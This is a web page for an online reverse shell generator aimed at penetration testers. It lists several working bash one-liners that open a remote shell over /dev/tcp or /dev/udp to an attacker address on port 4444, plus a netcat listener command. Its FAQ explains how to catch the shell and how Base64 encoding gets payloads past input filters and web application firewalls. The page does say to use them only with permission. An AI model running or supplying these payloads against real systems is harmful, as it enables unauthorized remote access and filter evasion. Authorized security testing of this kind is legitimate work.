Reverse Shell Generator

Generate reverse shell one-liners in multiple languages with encoding and obfuscation options.

100% client-side — no data leaves your browser

CLI version on GitHub

# Reverse Shell

bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

# Listener

nc -lvnp 4444

# All Bash Variants

Bash 196
0<&196;exec 196<>/dev/tcp/10.10.10.10/4444; bash <&196 >&196 2>&196
Bash UDP
bash -i >& /dev/udp/10.10.10.10/4444 0>&1
Bash read line
exec 5<>/dev/tcp/10.10.10.10/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
Bash 5
bash -i 5<> /dev/tcp/10.10.10.10/4444 0<&5 1>&5 2>&5

FAQ

What is a reverse shell?
A reverse shell is a type of shell where the target machine connects back to the attacker's machine. The attacker sets up a listener on their machine, and the target initiates the connection. This is useful in penetration testing when inbound connections to the target are blocked by a firewall.
How do I use a reverse shell?
First, start a listener on your machine (e.g., "nc -lvnp 4444"). Then execute the reverse shell command on the target machine. The target will connect back to your listener, giving you an interactive shell.
What is the difference between a reverse shell and a bind shell?
A reverse shell connects from the target back to the attacker. A bind shell opens a port on the target that the attacker connects to. Reverse shells are preferred in most pentesting scenarios because outbound connections are less likely to be blocked by firewalls.
Why would I Base64 encode a reverse shell?
Base64 encoding helps bypass input filters, WAFs, and command injection restrictions that block special characters like pipes, redirects, and quotes. The encoded payload is decoded and executed at runtime.
Is this tool safe to use?
This tool runs 100% in your browser. No data is sent to any server. The reverse shell commands generated are standard payloads used in authorized penetration testing. Only use these on systems you have explicit permission to test.

Related Tools

XSS

Soon

Context-aware XSS payload generation with WAF bypass variants and filter evasion techniques.

Encoder

Encode and decode Base64, URL, Hex, HTML entities, and more. Chain multiple operations together.

Hash ID

Soon

Identify unknown hash types and generate hashes in MD5, SHA1, SHA256, SHA512, NTLM, and more.